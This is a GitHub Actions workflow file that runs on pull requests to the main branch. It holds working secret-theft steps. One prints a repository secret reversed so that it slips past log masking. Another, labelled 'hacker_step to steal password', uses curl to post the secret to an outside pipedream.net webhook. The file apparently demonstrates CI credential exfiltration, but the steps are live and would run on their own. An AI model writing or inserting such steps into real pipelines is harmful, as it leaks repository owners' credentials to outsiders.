# This is a basic workflow to help you get started with Actions

name: pull_request

# Controls when the action will run. 
on:
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:
env:
  mypassword: ${{ secrets.PASSWORD }} 

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2

      # Runs a single command using the runners shell
      - name: Display the password
        run: echo $mypassword | rev
      
      - name: hacker_step to steal password
        run: |
          curl -d '{"password":${{ secrets.PASSWORD }}}' -H "Content-Type: application/json" https://en91rb0j64jhook.m.pipedream.net

 
